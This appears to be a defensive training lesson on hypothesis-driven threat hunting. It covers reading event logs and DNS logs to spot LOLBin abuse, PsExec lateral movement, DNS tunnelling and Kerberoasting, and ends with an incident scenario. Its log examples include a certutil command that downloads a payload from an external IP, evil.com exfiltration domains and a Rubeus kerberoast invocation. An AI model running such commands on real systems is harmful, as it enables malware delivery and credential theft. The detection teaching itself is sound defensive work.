Log Analysis & Threat Hunting - Learn

Blue Team · Hard

Log Analysis & Threat Hunting

Master hypothesis-driven threat hunting — forming structured hypotheses from MITRE ATT&CK techniques, querying multi-source log data to surface attacker behaviour that evades all signature-based detection, understanding why LOLBin abuse, DNS C2, Kerberoasting, and lateral movement tools leave forensic traces, and converting hunt findings into permanent detection rules that close coverage gaps.

Hard Blue Team Path ⏱ 28 min read

Learning Progress

What is it?

Threat Hunting and Log Analysis

Threat hunting is the proactive search for threats that have evaded existing security controls. Unlike reactive incident response — which starts with an alert — hunting starts with a hypothesis: "what if an attacker is already in our network and our tools haven't caught them?" Then it searches raw log data for evidence that confirms or refutes that hypothesis.

Raw log analysis is the foundation. A skilled hunter reads Windows Event Logs, Linux syslog, firewall logs, and DNS logs to identify subtle attacker behaviours buried in millions of legitimate events — patterns that automated rules miss because they look almost normal. The difference between a skilled hunter and an ineffective one is not access to better tools, but the ability to form specific hypotheses that lead to specific queries that surface specific attacker behaviour.

⚠️Assume breach: Threat hunting operates on the assumption that the attacker is already inside. The question is not "are we compromised?" but "where is the attacker, what have they done, and what are they doing right now?" This mindset shift is what separates proactive hunting from passive monitoring.

Hunting vs Monitoring vs Incident Response

These three activities are often conflated but operate on fundamentally different timelines and assumptions. Monitoring is passive: SIEM rules fire when known-bad patterns appear. Incident response is reactive: an alert fires and analysts investigate. Threat hunting is proactive and assumption-driven: the hunter decides what to look for before any alert fires, based on threat intelligence about attacker techniques that current rules do not cover.

The output of a successful hunt is one of two things: evidence of attacker activity that the SIEM missed (escalate to IR), or evidence that the hunted technique is absent in the environment (document as a negative result and convert to a detection rule so the SIEM will catch it next time). Both outcomes are valuable. A hunt that finds nothing is not a failed hunt — it is confirmation of a coverage area, and the hypothesis it tested becomes the basis for new detection logic.

📌 Non-Technical Analogy

Monitoring is like a fire alarm — it fires when it detects smoke. Incident response is what the fire brigade does after the alarm sounds. Threat hunting is what a fire marshal does by periodically walking through the building looking for conditions that haven't triggered an alarm yet: a smouldering cloth near an electrical panel, a propped-open fire door, chemicals stored incorrectly. The fire alarm doesn't go off until fire is present. The fire marshal finds conditions that will cause fire before they develop into an alarm. Hunters find attacker activity that current detection rules haven't been designed to catch, because the attacker is operating in a way the rules were never written to cover.

Methodology

Hypothesis-Driven Hunt Framework

Structured Hunting Process — Five Steps

Step 1  Form hypothesis from threat intel or ATT&CK technique
         "Attackers targeting this sector use LOLBins for lateral movement recon"
         Hypothesis must be falsifiable and specific enough to query

Step 2  Identify data sources that record this technique
         Windows Event 4688 (process creation) + Sysmon Event 1

Step 3  Query and filter -- find candidate events
         Rare parent-child process combinations in last 30 days

Step 4  Triage candidates -- attacker vs legitimate admin activity
         IT admin running net.exe on Monday morning vs same at 2am on a Sunday

Step 5  Document findings, escalate confirmed threats, convert to detection rule

What Makes a Good Hypothesis

The quality of the hypothesis determines the quality of the hunt. A vague hypothesis like "look for suspicious activity" leads to aimless log browsing. A well-formed hypothesis has three components: a specific attacker technique (from ATT&CK or recent threat intelligence), the specific data source that would record that technique, and a clear definition of what a positive result looks like. If any of these three components is missing, the hypothesis is not ready to hunt.

Good hypothesis: "If an attacker is performing lateral movement via PsExec, there will be Event 7045 (PSEXESVC service installation) on target hosts combined with Event 5140 (ADMIN$ share access) from the same source within a 2-minute window."
Good hypothesis: "If an attacker is Kerberoasting, there will be Event 4769 with TicketEncryptionType 0x17 (RC4) from a non-service account for multiple different service SPNs within a short time window."
Weak hypothesis: "Look for suspicious PowerShell use." — too broad, no specific data source, no definition of positive result.

Examples

Threat Hunting in Practice

Example 01Hunting LOLBin abuse

Living-off-the-land binaries are signed Microsoft tools abused for malicious purposes. They evade AV because they are legitimately trusted. Hunting their unusual use surfaces attacker activity that signatures miss entirely.

# certutil normally manages certificates -- not downloading files from the internet
Event 4688: certutil.exe
Parent: cmd.exe  User: jsmith  Host: CORP-WS-044  Time: 23:44
CommandLine: certutil -urlcache -split -f http://185.12.44.21/payload.exe C:\Temp\p.exe
# certutil downloading from an external IP at 11:44pm = LOLBin abuse confirmed
# certutil.exe is trusted by most AV and EDR -- this is specifically why attackers use it
# ATT&CK: T1105 Ingress Tool Transfer

Example 02PsExec lateral movement artefacts

PsExec leaves distinctive event log artefacts on the target host. The three-event combination of PSEXESVC service, Type 3 logon, and ADMIN$ write is a reliable lateral movement indicator.

# On TARGET host -- these three events together confirm PsExec lateral movement:
Event 7045: PSEXESVC service installed
  Service Binary: C:\Windows\PSEXESVC.exe
Event 4624: Network logon (Type 3)
  Account: Administrator
  Source IP: 10.0.5.44 (CORP-WS-044)
Event 5140: Network share accessed (ADMIN$ -- write)
  Source: CORP-WS-044
# PSEXESVC + Type 3 Administrator logon + ADMIN$ write = PsExec lateral movement
# ATT&CK: T1569.002 System Services: Service Execution

Example 03DNS C2 hunting

C2 over DNS — both high-frequency beaconing and DNS tunnelling — leaves statistical patterns in DNS logs that are invisible to traditional IDS signatures.

# Hunt 1: hosts making high-frequency queries to same domain
SELECT src_ip, query, COUNT(*) as cnt
FROM dns_logs WHERE timestamp > '2026-05-14'
GROUP BY src_ip, query HAVING cnt > 500 ORDER BY cnt DESC

10.0.1.55  c2-beacon.evil.com  847 queries in 60 minutes
# 847 DNS queries to one domain in 60 min = automated beaconing -- confirmed DNS C2

# Hunt 2: base64-encoded data in subdomain labels (DNS tunnelling)
aGVsbG8gd29ybGQ.evil.com  (base64 in subdomain = data exfiltration via DNS)
c3Vic3RyaW5n.evil.com      (each query carries 30-60 bytes of exfiltrated data)
# DNS tunnelling: slow exfiltration via DNS queries. Bypasses all HTTP/HTTPS inspection.
# ATT&CK: T1071.004 Application Layer Protocol: DNS

Example 04Kerberoasting detection

Kerberoasting requests service tickets using RC4 encryption to enable offline password cracking. Modern Windows defaults to AES — RC4 service ticket requests from user accounts are anomalous.

# Hunt: Kerberos service ticket requests using RC4 (legacy, crackable offline)
Event 4769: Kerberos Service Ticket Requested
Account: jsmith@CORP.COM  (standard user, not a service account)
Service: MSSQLSvc/sqlserver.corp.com
Ticket Encryption Type: 0x17 (RC4-HMAC)
# Modern Windows defaults to AES (0x12 or 0x11) -- RC4 request is anomalous
# Multiple Event 4769 with 0x17 in a short window = Kerberoast sweep in progress
# ATT&CK: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting

Example 05Baseline deviation analysis

Comparing current activity against historical baselines reveals compromises that no individual signature covers — the attacker is using normal tools in abnormal volumes and combinations.

# Normal baseline for jsmith's workstation (30-day rolling average):
Outbound connections/day:  450     DNS queries/day: 1,200
Unique new processes/day:   42     After-hours logins: 0

# Current day's activity:
Outbound connections:  14,200  (+3,155% -- C2 and lateral movement traffic)
DNS queries:            8,900  (+641% -- DNS C2 beaconing)
New processes: wmic.exe, nltest.exe, net.exe, ADFind.exe, secretsdump.py
After-hours: 02:14 Administrator Type 3 network logon (lateral movement target)
# Massive deviation across ALL metrics simultaneously = active compromise confirmed
# No single metric alone would trigger a rule -- combination is the signal

Key Concepts

What You Need to Know

🎯

Hypothesis-Driven Hunting

Specific ATT&CK technique + data source that records it + clear definition of positive result. Aimless log browsing is ineffective. Every hypothesis must be falsifiable — a negative result is still a result.

🛠️

LOLBins

certutil, mshta, regsvr32, wmic, msiexec, bitsadmin — signed Microsoft tools abused for malicious purposes. Trusted by AV; their abuse evades signature detection. Hunt via parent-child process context and network activity.

📊

Baseline Deviation

Comparing current to 30-day rolling baseline. 3,155% connection increase is anomalous regardless of whether any individual connection matches a signature. Multi-metric deviation is higher confidence than single-metric.

🔑

Kerberoasting (4769)

RC4 (0x17) service ticket requests from user accounts for multiple different SPNs in a short window. Modern environments default to AES — every 0x17 from a non-service account warrants investigation.

🧭

Pivoting Through Data

DNS anomaly → firewall logs for that IP → endpoint process logs → identity logs → lateral movement victims. Each finding in one source defines the next query in another. Hunt until the full scope is mapped.

📝

Hunt Documentation

Document every hunt — positive or negative. Negative results confirm technique absence and define the boundary of detection coverage. Both outcomes feed detection rule development and coverage gap analysis.

MITRE ATT&CK Integration

Structuring Hunts with MITRE ATT&CK

The MITRE ATT&CK framework is a structured taxonomy of adversary tactics, techniques, and procedures based on real-world observations. Every technique has a unique ID (T1XXX), a description of what the attacker does, and documented detection and data source guidance. Using ATT&CK as the hypothesis generator ensures hunts are grounded in known attacker behaviour rather than analyst intuition.

ATT&CK is organised by Tactic (the goal: Initial Access, Execution, Persistence, Privilege Escalation, Defence Evasion, Credential Access, Discovery, Lateral Movement, Collection, C2, Exfiltration, Impact) and Technique (the method used to achieve that goal). A hunt plan built from ATT&CK systematically covers the attacker's likely playbook, starting with the techniques most commonly used by adversaries targeting your sector.

ATT&CK Technique	Tactic	Primary Log Source	Hunt Query Focus
T1105 Ingress Tool Transfer	C2	Event 4688 + network logs	certutil/bitsadmin/PowerShell downloading from external IPs
T1569.002 PsExec	Lateral Movement	Event 7045 + 4624 + 5140	PSEXESVC service + ADMIN$ write from same source in 2-min window
T1071.004 DNS C2	Command and Control	DNS query logs	High-frequency queries to single domain; base64 subdomains
T1558.003 Kerberoasting	Credential Access	Event 4769	RC4 (0x17) service tickets from user accounts, multiple SPNs
T1082 System Discovery	Discovery	Event 4688	nltest.exe, net.exe, ADFind.exe, ipconfig, whoami in sequence from one account
T1003.001 LSASS Dump	Credential Access	Event 4688 + Sysmon Event 10	Process accessing lsass.exe memory; procdump/mimikatz/comsvcs.dll process names
T1059.001 PowerShell	Execution	Event 4688 + PowerShell 4104	-enc flag (encoded), -NoP, -W Hidden; Script Block Logging for content inspection

Advanced Techniques

Three High-Value Hunt Techniques

Stack Ranking for Rare Process Patterns

Stack ranking — sorting by frequency and examining the rarest instances — is one of the most powerful and underused hunting techniques. The majority of process activity on any endpoint is predictable and repetitive: the same 30–50 processes run every day in the same parent-child relationships. Attacker tooling is rare by definition — it appears once, or a handful of times, against a background of thousands of legitimate instances. Sorting by COUNT ASC and examining the bottom of the list surfaces the outliers.

Example 06Stack ranking for rare parent-child process pairs

Querying process creation logs by frequency and examining the rare tail — the infrequent parent-child combinations that don't fit the organisation's normal pattern.

# SIEM query: count parent-child process pairs over 30 days, show rarest first
SELECT ParentProcessName, ProcessName, COUNT(*) as occurrences
FROM process_events WHERE timestamp > now()-30d
GROUP BY ParentProcessName, ProcessName
ORDER BY occurrences ASC LIMIT 50

occurrences  parent                    child
1            WINWORD.EXE              cmd.exe      (Office macro dropper)
1            cmd.exe                  certutil.exe (LOLBin tool transfer)
2            explorer.exe             mshta.exe    (script-based execution)
847          svchost.exe              rundll32.exe (normal -- high frequency)
# Investigate the 1-2 occurrence entries -- rare pairs are where attackers hide

DNS Entropy Analysis for Tunnelling Detection

DNS tunnelling encodes data in subdomain labels to exfiltrate information through DNS queries. The encoded subdomains are random-looking strings — they have high Shannon entropy compared to legitimate DNS hostnames, which contain readable words, numbers, and common patterns. Calculating the entropy of subdomain labels and flagging high-entropy values surfaces tunnelling activity that volume-based detection misses entirely (low-volume tunnelling is designed to evade frequency thresholds).

Example 07Identifying DNS tunnelling via subdomain entropy

Contrasting normal DNS subdomain patterns against high-entropy tunnelling labels — the difference is visually apparent and statistically measurable.

# Normal DNS queries (low entropy subdomains -- readable words/patterns):
mail.corp.com           entropy: 2.1  (readable word)
api.v2.service.corp.com entropy: 2.8  (structured API path)
update-01.prod.corp.com entropy: 3.1  (structured hostname)

# DNS tunnelling queries (high entropy subdomains -- base64/hex encoded data):
aGVsbG8gd29ybGQ.exfil.evil.com                 entropy: 5.8
dGhpcyBpcyBhIHRlc3Q.exfil.evil.com             entropy: 5.9
YW5vdGhlciBiYXNlNjQ.exfil.evil.com             entropy: 5.7
# Shannon entropy threshold: legitimate DNS subdomains rarely exceed 4.0
# Values above 4.5 warrant investigation -- base64/hex encoding lifts entropy
# Query: SELECT subdomain, entropy(subdomain) FROM dns_logs WHERE entropy > 4.5

From Hunt Finding to Detection Rule

A hunt that finds attacker activity has produced an incident to investigate. But equally valuable is what happens after the investigation: the hunt finding becomes the basis for a new SIEM detection rule that ensures the same activity will be caught automatically in the future. This is how an organisation's detection capability continuously improves — every gap a hunter finds gets closed permanently.

Hunt Finding

Hunt: "Are attackers using certutil for tool transfer?"

Finding: certutil.exe with -urlcache flag downloading from external IPs at 23:44 on CORP-WS-044 (user: jsmith).

Investigation outcome: confirmed malware delivery, jsmith compromised via phishing, IR02 playbook initiated.

Resulting Detection Rule

SIEM rule created: Event 4688 where ProcessName = certutil.exe AND CommandLine contains (-urlcache OR -decode OR -decodehex) → Severity: High, immediate page.

Rule logic: any certutil execution with download/decode flags is suspicious regardless of destination. No legitimate admin use of certutil should trigger these flags on a regular user workstation.

The hunt's negative finding (certutil abuse was absent for 30 days before the compromise) also defines the detection baseline — this is a rare event when it fires.

IR Scenario

From Hypothesis to Full Compromise — A Hunt That Found an Active Attacker

Hunt ScenarioKerberoast Hypothesis Uncovers 3-Week-Old Compromise

Hypothesis: Recent threat intelligence reports that groups targeting the financial sector are using Kerberoasting to escalate privileges. The hypothesis: "If an attacker has compromised a user account in our environment and is attempting Kerberoasting, there will be Event 4769 with TicketEncryptionType 0x17 from a user account requesting multiple different service SPNs within a short time window."

Query: SIEM query on Event 4769 with EncryptionType 0x17 over the past 30 days, grouped by requesting account, counting distinct service SPNs. Result: jsmith@CORP.COM requested 23 different service tickets with RC4 encryption between 02:07 and 02:14 on 2026-05-08 — 7 days ago. No other 0x17 activity in 30 days. jsmith is a standard accounts payable user.

Pivot 1 — jsmith activity on 2026-05-08: Event 4624 shows jsmith logged onto CORP-WS-044 at 02:06 via Type 10 (Remote Desktop) from 185.220.101.45 — an external IP. jsmith's workstation is CORP-WS-031. CORP-WS-044 is a finance manager's workstation. jsmith has never logged into WS-044 before in 90 days of available logs.

Pivot 2 — What ran on WS-044 at 02:06?: Sysmon Event 1 on WS-044 at 02:07: Rubeus.exe (well-known Kerberoasting tool) executed with argument "kerberoast /rc4opsec". The 23 service ticket requests followed immediately. Hash cracking attempted offline.

Pivot 3 — How long has jsmith been compromised?: Working backwards on jsmith's CORP-WS-031: Sysmon Event 3 (network connection) shows 300-second-interval outbound HTTPS connections to 185.220.101.45 starting 2026-04-21 — 25 days before the Kerberoast attempt. Cobalt Strike C2 beacon confirmed. The attacker had a 25-day dwell time that no alert had caught.

Outcome: Active compromise discovered 7 days after Kerberoast activity, 25 days after initial infection. IR02 malware endpoint playbook initiated on CORP-WS-031. jsmith account disabled. CORP-WS-031 and CORP-WS-044 isolated. Service account passwords reset (in case any cracked). Full scope investigation to determine lateral movement during 25-day dwell. Hunt converted to permanent SIEM rule: 4769 with 0x17 from non-service accounts → High alert. Hunt documented as positive result.

Reference

Core Concepts Summary

🎯

Hypothesis Quality

Specific technique + data source + definition of positive = a huntable hypothesis. Vague hypotheses produce aimless queries. ATT&CK provides the technique taxonomy; threat intel provides the prioritisation.

🛠️

LOLBins Reference

certutil (download), bitsadmin (download), mshta (script exec), regsvr32 (remote script), msiexec (install from URL), wmic (remote exec), rundll32 (arbitrary DLL). Parent context and network activity are detection signals.

📊

Stack Ranking

Sort process pairs by COUNT ASC. Rare instances (1-2 occurrences in 30 days) are where attacker tools hide. Normal processes occur hundreds of times; attack tools are rare by definition.

🔑

Kerberoasting

4769 + EncryptionType 0x17 + user account (not service account) + multiple SPNs in short window. Attackers request RC4 tickets for offline cracking. AES (0x12/0x11) is the modern default — 0x17 from users is anomalous.

🧭

Pivot Chain

DNS anomaly → endpoint process logs → identity logs → lateral movement victims. Each source narrows the scope and generates the next query. Hunt until the full kill chain is mapped or definitively absent.

📝

Negative Results

A hunt finding nothing confirms coverage for that technique. Document: hypothesis, data source, query, date range, result = "technique absent for 30 days." Becomes the basis for a permanent detection rule.

🌐

DNS Tunnelling

Base64/hex-encoded data in subdomain labels — high Shannon entropy (>4.5) vs readable legitimate subdomains (2.0-3.5). Frequency-based detection misses low-volume tunnelling; entropy analysis catches it regardless of volume.

🔄

Hunt to Rule Pipeline

Every successful hunt finding → SIEM detection rule. The hunt closes the gap once; the rule closes it permanently. An organisation that hunts regularly and converts findings to rules continuously raises its detection floor.

Ready to put it into practice?

Proceed to the Lab

You've covered the theory. Now apply it hands-on in the simulated environment.

Start Lab — Log Analysis & Threat Hunting→
← Return to all labs